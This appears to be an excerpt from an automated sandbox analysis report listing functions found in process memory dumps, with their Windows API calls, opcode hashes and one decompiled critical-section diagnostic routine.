                                                                      Function 00127000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011CCC0,?,?), ref: 0012703C
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                      • Instruction ID: 67fa5fbb6d766c122edaeb7931622a076a6eeedf735865c7a7683c50b7bb148f
                                                                      • Opcode Fuzzy Hash: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                      • Instruction Fuzzy Hash: 66E092333803143AE3306599BC03FA7B39CCB91B20F150026FA0DEB2C1D695F91142A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001286C8, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011CF92,0011CF92,?,00000000,?,?), ref: 00128650
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction ID: 95ea95cd4e00694aa4392ba1e0405e6b483616a867627426e6c69b2eb55f70c8
                                                                      • Opcode Fuzzy Hash: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction Fuzzy Hash: E6F030B62112146FD720EF99EC45DE7779EEF84360B018555F90C57242C631E92086B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00128620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011CF92,0011CF92,?,00000000,?,?), ref: 00128650
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 80f9644a2a552c4d8f4a540438d55e44300297a26b619ffb269765336efc07e5
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 4EE01AB12002186BDB10DF89DC85EE737ADAF88650F018154BA0857241DA30E8148BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0011D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00117C63,?), ref: 0011D42B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction ID: 9d93ba17a822e896013c4cb416392a6c86f0bdf5c82efed4df6f9f61d302ab7a
                                                                      • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction Fuzzy Hash: 04D0A7717903043BE610FAA8AC03F6632CD9B54B00F494074F948D73C3DA64F5004161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02B1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9bf9d988ef331c32cfe43a6043211565ffbba1b8c14a5f08a1cda502973c434f
                                                                      • Instruction ID: b1bcb7486a2cd87c15227ccd829d805069f5ff41ac7778ecfe192769cc4953d0
                                                                      • Opcode Fuzzy Hash: 9bf9d988ef331c32cfe43a6043211565ffbba1b8c14a5f08a1cda502973c434f
                                                                      • Instruction Fuzzy Hash: 57B09B729015D5C5D711D76046087177900B7D0751F76C095D2060641A4778C095F5B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 02B6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E02B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                      0x02b6fdda
                                                                      0x02b6fde2
                                                                      0x02b6fde5
                                                                      0x02b6fdec
                                                                      0x02b6fdfa
                                                                      0x02b6fdff
                                                                      0x02b6fe0a
                                                                      0x02b6fe0f
                                                                      0x02b6fe17
                                                                      0x02b6fe1e
                                                                      0x02b6fe19
                                                                      0x02b6fe19
                                                                      0x02b6fe19
                                                                      0x02b6fe20
                                                                      0x02b6fe21
                                                                      0x02b6fe22
                                                                      0x02b6fe25
                                                                      0x02b6fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B6FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B6FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B6FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: c005addcb5df5cb9589c7e0e1a19739b188d7671ab1f741599b42c3e09edb650
                                                                      • Instruction ID: 876c1a94babdff9a5ba767490173dcadf22410672c98ae85a1d8b7bf3067295f
                                                                      • Opcode Fuzzy Hash: c005addcb5df5cb9589c7e0e1a19739b188d7671ab1f741599b42c3e09edb650
                                                                      • Instruction Fuzzy Hash: 16F0C232240601BBE6301A95DC06F33BF5AEB44730F240255F628565D1DA62B83087A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%